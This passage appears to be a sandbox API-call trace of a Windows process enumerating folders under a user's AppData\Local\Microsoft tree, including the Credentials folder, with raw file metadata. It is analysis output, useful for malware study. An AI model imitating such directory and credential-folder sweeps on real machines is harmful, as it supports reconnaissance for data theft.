ftLastAccessTime.dwLowDateTime=0xcba84960, ftLastAccessTime.dwHighDateTime=0x1d706b2, ftLastWriteTime.dwLowDateTime=0xcba84960, ftLastWriteTime.dwHighDateTime=0x1d706b2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Media Player", cAlternateFileName="MEDIAP~1")) returned 1 [0281.529] FindNextFileW (in: hFindFile=0x59c298, lpFindFileData=0x43e788 | out: lpFindFileData=0x43e788*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x14ff8dd0, ftCreationTime.dwHighDateTime=0x1d70910, ftLastAccessTime.dwLowDateTime=0x5bb5ba10, ftLastAccessTime.dwHighDateTime=0x1d70910, ftLastWriteTime.dwLowDateTime=0x5bb5ba10, ftLastWriteTime.dwHighDateTime=0x1d70910, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Office", cAlternateFileName="")) returned 1 [0281.546] FindNextFileW (in: hFindFile=0x59c298, lpFindFileData=0x43e788 | out: lpFindFileData=0x43e788*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe8a7c4d0, ftCreationTime.dwHighDateTime=0x1d70911, ftLastAccessTime.dwLowDateTime=0xf26feb50, ftLastAccessTime.dwHighDateTime=0x1d70911, ftLastWriteTime.dwLowDateTime=0xf26feb50, ftLastWriteTime.dwHighDateTime=0x1d70911, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="OneDrive", cAlternateFileName="")) returned 1 [0281.546] FindNextFileW (in: hFindFile=0x59c298, lpFindFileData=0x43e788 | out: lpFindFileData=0x43e788*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x2ce8e9d0, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x23884f50, ftLastAccessTime.dwHighDateTime=0x1d7100d, ftLastWriteTime.dwLowDateTime=0x23884f50, ftLastWriteTime.dwHighDateTime=0x1d7100d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Outlook", cAlternateFileName="")) returned 1 [0281.547] FindNextFileW (in: hFindFile=0x59c298, lpFindFileData=0x43e788 | out: lpFindFileData=0x43e788*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x796be670, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0xb1ed8fe0, ftLastAccessTime.dwHighDateTime=0x1d73a91, ftLastWriteTime.dwLowDateTime=0xb1ed8fe0, ftLastWriteTime.dwHighDateTime=0x1d73a91, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows", cAlternateFileName="")) returned 1 [0281.547] FindNextFileW (in: hFindFile=0x59c298, lpFindFileData=0x43e788 | out: lpFindFileData=0x43e788*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe8cddad0, ftCreationTime.dwHighDateTime=0x1d70911, ftLastAccessTime.dwLowDateTime=0xe8d03c30, ftLastAccessTime.dwHighDateTime=0x1d70911, ftLastWriteTime.dwLowDateTime=0xe8d03c30, ftLastWriteTime.dwHighDateTime=0x1d70911, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows Live", cAlternateFileName="WINDOW~4")) returned 1 [0281.547] FindNextFileW (in: hFindFile=0x59c298, lpFindFileData=0x43e788 | out: lpFindFileData=0x43e788*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x796be670, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7d4ee530, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7d4ee530, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows Mail", cAlternateFileName="WINDOW~3")) returned 1 [0281.547] FindNextFileW (in: hFindFile=0x59c298, lpFindFileData=0x43e788 | out: lpFindFileData=0x43e788*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x79698510, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79698510, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xf7de167e, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows Media", cAlternateFileName="WINDOW~2")) returned 1 [0281.547] FindNextFileW (in: hFindFile=0x59c298, lpFindFileData=0x43e788 | out: lpFindFileData=0x43e788*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x79698510, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x799de350, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x184eadb, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows Sidebar", cAlternateFileName="WINDOW~1")) returned 1 [0281.548] FindNextFileW (in: hFindFile=0x59c298, lpFindFileData=0x43e788 | out: lpFindFileData=0x43e788*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0281.548] FindClose (in: hFindFile=0x59c298 | out: hFindFile=0x59c298) returned 1 [0281.548] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x43e740) returned 1 [0281.548] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x43e9a0) returned 1 [0281.548] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Credentials", nBufferLength=0x105, lpBuffer=0x43e4dc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Credentials", lpFilePart=0x0) returned 0x36 [0281.549] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x43e9c0) returned 1 [0281.549] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Credentials", nBufferLength=0x105, lpBuffer=0x43e4a0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Credentials", lpFilePart=0x0) returned 0x36 [0281.549] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Credentials\\*", lpFindFileData=0x43e770 | out: lpFindFileData=0x43e770*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x798876f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x798876f0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xea43994d, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x59c298 [0281.550] FindNextFileW (in: hFindFile=0x59c298, lpFindFileData=0x43e778 | out: lpFindFileData=0x43e778*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x798876f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x798876f0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xea43994d, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0281.550] FindNextFileW (in: hFindFile=0x59c298, lpFindFileData=0x43e778 | out: lpFindFileData=0x43e778*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x798876f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x798876f0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xea43994d, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0281.550] FindClose (in: hFindFile=0x59c298 | out: hFindFile=0x59c298) returned 1 [0281.550] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x43e730) returned 1 [0281.550] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x43e990) returned 1 [0281.551] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Feeds", nBufferLength=0x105, lpBuffer=0x43e4dc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Feeds", lpFilePart=0x0) returned 0x30 [0281.551] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x43e9c0) returned 1 [0281.551] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Feeds", nBufferLength=0x105, lpBuffer=0x43e4a0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Feeds", lpFilePart=0x0) returned 0x30 [0281.551] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Feeds\\*", lpFindFileData=0x43e770 | out: lpFindFileData=0x43e770*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x798876f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79bcd530, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xff0498b1, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x59c298 [0281.552] FindNextFileW (in: hFindFile=0x59c298, lpFindFileData=0x43e778 | out: lpFindFileData=0x43e778*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x798876f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79bcd530, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xff0498b1, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0281.552] FindNextFileW (in: hFindFile=0x59c298, lpFindFileData=0x43e778 | out: lpFindFileData=0x43e778*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x79ba73d0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79ba73d0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xff107f92, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x1a00, dwReserved0=0x0, dwReserved1=0x0, cFileName="FeedsStore.feedsdb-ms", cAlternateFileName="FEEDSS~1.FEE")) returned 1 [0281.552] FindNextFileW (in: hFindFile=0x59c298, lpFindFileData=0x43e778 | out: lpFindFileData=0x43e778*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x798876f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79ba73d0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xfee3456d, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft Feeds~", cAlternateFileName="MICROS~1")) returned 1 [0281.552] FindNextFileW (in: hFindFile=0x59c298, lpFindFileData=0x43e778 | out: lpFindFileData=0x43e778*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x798876f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x798876f0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xff0498b1, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~", cAlternateFileName="{5588A~1")) returned 1 [0281.553] FindNextFileW (in: hFindFile=0x59c298, lpFindFileData=0x43e778 | out: lpFindFileData=0x43e778*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x798876f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x798876f0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xff0498b1, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~", cAlternateFileName="{5588A~1")) returned 0 [0281.553] FindClose (in: hFindFile=0x59c298 | out: hFindFile=0x59c298) returned 1 [0281.553] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x43e730) returned 1 [0281.553] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x43e990) returned 1 [0281.553] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Feeds Cache", nBufferLength=0x105, lpBuffer=0x43e4dc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Feeds Cache", lpFilePart=0x0) returned 0x36 [0281.554] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x43e9c0) returned 1 [0281.554] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Feeds Cache", nBufferLength=0x105, lpBuffer=0x43e4a0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Feeds Cache", lpFilePart=0x0) returned 0x36 [0281.554] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Feeds Cache\\*", lpFindFileData=0x43e770 | out: lpFindFileData=0x43e770*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x79861590, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79b81270, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xfea09ee5, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x59c298 [0281.555] FindNextFileW (in: hFindFile=0x59c298, lpFindFileData=0x43e778 | out: lpFindFileData=0x43e778*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x79861590, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79b81270, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xfea09ee5, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0281.555] FindNextFileW (in: hFindFile=0x59c298, lpFindFileData=0x43e778 | out: lpFindFileData=0x43e778*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x79861590, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79b81270, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xfedc214c, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="1NBUR4HR", cAlternateFileName="")) returned 1 [0281.555] FindNextFileW (in: hFindFile=0x59c298, lpFindFileData=0x43e778 | out: lpFindFileData=0x43e778*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x79861590, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79b81270, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xfee8082e, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="6ASVN7J7", cAlternateFileName="")) returned 1 [0281.555] FindNextFileW (in: hFindFile=0x59c298, lpFindFileData=0x43e778 | out: lpFindFileData=0x43e778*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x79861590, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79b81270, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xff06fa11, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="D68G7BIJ", cAlternateFileName="")) returned 1 [0281.556] FindNextFileW (in: hFindFile=0x59c298, lpFindFileData=0x43e778 | out: lpFindFileData=0x43e778*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x79b81270, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79b81270, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xfe9e3d85, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x43, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0281.556] FindNextFileW (in: hFindFile=0x59c298, lpFindFileData=0x43e778 | out: lpFindFileData=0x43e778*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x79b81270, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79b81270, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xc8db1a10, ftLastWriteTime.dwHighDateTime=0x1d7e793, nFileSizeHigh=0x0, nFileSizeLow=0x8000, dwReserved0=0x0, dwReserved1=0x0, cFileName="index.dat", cAlternateFileName="")) returned 1 [0281.556] FindNextFileW (in: hFindFile=0x59c298, lpFindFileData=0x43e778 | out: lpFindFileData=0x43e778*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x79861590, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79b81270, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xfed03a6b, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="KQMHSVKD", cAlternateFileName="")) returned 1 [0281.556] FindNextFileW (in: hFindFile=0x59c298, lpFindFileData=0x43e778 | out: lpFindFileData=0x43e778*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x79861590, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79b81270, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xfed03a6b, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="KQMHSVKD", cAlternateFileName="")) returned 0 [0281.556] FindClose (in: hFindFile=0x59c298 | out: hFindFile=0x59c298) returned 1 [0281.556] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x43e730) returned 1 [0281.557] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x43e990) returned 1 [0281.557] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\FORMS", nBufferLength=0x105, lpBuffer=0x43e4dc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\FORMS", lpFilePart=0x0) returned 0x30 [0281.557] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x43e9c0) returned 1 [0281.557] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\FORMS", nBufferLength=0x105, lpBuffer=0x43e4a0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\FORMS", lpFilePart=0x0) returned 0x30 [0281.557] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\FORMS\\*", lpFindFileData=0x43e770 | out: lpFindFileData=0x43e770*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x2cedac90, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x2cedac90, ftLastAccessTime.dwHighDateTime=0x1d70912, ftLastWriteTime.dwLowDateTime=0x2cedac90, ftLastWriteTime.dwHighDateTime=0x1d70912, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x59c298 [0281.558] FindNextFileW (in: hFindFile=0x59c298, lpFindFileData=0x43e778 | out: lpFindFileData=0x43e778*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x2cedac90, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x2cedac90, ftLastAccessTime.dwHighDateTime=0x1d70912, ftLastWriteTime.dwLowDateTime=0x2cedac90, ftLastWriteTime.dwHighDateTime=0x1d70912, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0281.558] FindNextFileW (in: hFindFile=0x59c298, lpFindFileData=0x43e778 | out: lpFindFileData=0x43e778*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x2cedac90, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x2cedac90, ftLastAccessTime.dwHighDateTime=0x1d70912, ftLastWriteTime.dwLowDateTime=0x2d1623f0, ftLastWriteTime.dwHighDateTime=0x1d70912, nFileSizeHigh=0x0, nFileSizeLow=0x3c0dc, dwReserved0=0x0, dwReserved1=0x0, cFileName="FRMCACHE.DAT", cAlternateFileName="")) returned 1 [0281.558] FindNextFileW (in: hFindFile=0x59c298, lpFindFileData=0x43e778 | out: lpFindFileData=0x43e778*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0281.559] FindClose (in: hFindFile=0x59c298 | out: hFindFile=0x59c298) returned 1 [0281.559] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x43e730) returned 1 [0281.559] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x43e990) returned 1 [0281.559] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Internet Explorer", nBufferLength=0x105, lpBuffer=0x43e4dc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Internet Explorer", lpFilePart=0x0) returned 0x3c [0281.559] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x43e9c0) returned 1 [0281.559] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Internet Explorer", nBufferLength=0x105, lpBuffer=0x43e4a0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Internet Explorer", lpFilePart=0x0) returned 0x3c [0281.560] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Internet Explorer\\*", lpFindFileData=0x43e770 | out: lpFindFileData=0x43e770*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7983b430, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x519a8410, ftLastAccessTime.dwHighDateTime=0x1d7b064, ftLastWriteTime.dwLowDateTime=0x519a8410, ftLastWriteTime.dwHighDateTime=0x1d7b064, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x59c298 [0281.560] FindNextFileW (in: hFindFile=0x59c298, lpFindFileData=0x43e778 | out: lpFindFileData=0x43e778*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7983b430, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x519a8410, ftLastAccessTime.dwHighDateTime=0x1d7b064, ftLastWriteTime.dwLowDateTime=0x519a8410, ftLastWriteTime.dwHighDateTime=0x1d7b064, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0281.560] FindNextFileW (in: hFindFile=0x59c298, lpFindFileData=0x43e778 | out: lpFindFileData=0x43e778*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x79b81270, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79b81270, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xb371c2, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x2fa9, dwReserved0=0x0, dwReserved1=0x0, cFileName="brndlog.bak", cAlternateFileName="")) returned 1 [0281.561] FindNextFileW (in: hFindFile=0x59c298, lpFindFileData=0x43e778 | out: lpFindFileData=0x43e778*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x79b81270, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79b81270, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7ef07f70, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x2fa5, dwReserved0=0x0, dwReserved1=0x0, cFileName="brndlog.txt", cAlternateFileName="")) returned 1 [0281.561] FindNextFileW (in: hFindFile=0x59c298, lpFindFileData=0x43e778 | out: lpFindFileData=0x43e778*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x519a8410, ftCreationTime.dwHighDateTime=0x1d7b064, ftLastAccessTime.dwLowDateTime=0x519a8410, ftLastAccessTime.dwHighDateTime=0x1d7b064, ftLastWriteTime.dwLowDateTime=0x8e4a11a0, ftLastWriteTime.dwHighDateTime=0x1d7b064, nFileSizeHigh=0x0, nFileSizeLow=0x2466, dwReserved0=0x0, dwReserved1=0x0, cFileName="frameiconcache.dat", cAlternateFileName="FRAMEI~1.DAT")) returned 1 [0281.561] FindNextFileW (in: hFindFile=0x59c298, lpFindFileData=0x43e778 | out: lpFindFileData=0x43e778*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4dbf6cc0, ftCreationTime.dwHighDateTime=0x1d7b064, ftLastAccessTime.dwLowDateTime=0x4dbf6cc0, ftLastAccessTime.dwHighDateTime=0x1d7b064, ftLastWriteTime.dwLowDateTime=0x4dbf6cc0, ftLastWriteTime.dwHighDateTime=0x1d7b064, nFileSizeHigh=0x0, nFileSizeLow=0x4000, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSIMGSIZ.DAT", cAlternateFileName="")) returned 1 [0281.561] FindNextFileW (in: hFindFile=0x59c298, lpFindFileData=0x43e778 | out: lpFindFileData=0x43e778*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x4d225200, ftCreationTime.dwHighDateTime=0x1d7b064, ftLastAccessTime.dwLowDateTime=0x518e9d30, ftLastAccessTime.dwHighDateTime=0x1d7b064, ftLastWriteTime.dwLowDateTime=0x518e9d30, ftLastWriteTime.dwHighDateTime=0x1d7b064, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Recovery", cAlternateFileName="")) returned 1 [0281.561] FindNextFileW (in: hFindFile=0x59c298, lpFindFileData=0x43e778 | out: lpFindFileData=0x43e778*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x4d225200, ftCreationTime.dwHighDateTime=0x1d7b064, ftLastAccessTime.dwLowDateTime=0x518e9d30, ftLastAccessTime.dwHighDateTime=0x1d7b064, ftLastWriteTime.dwLowDateTime=0x518e9d30, ftLastWriteTime.dwHighDateTime=0x1d7b064, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, 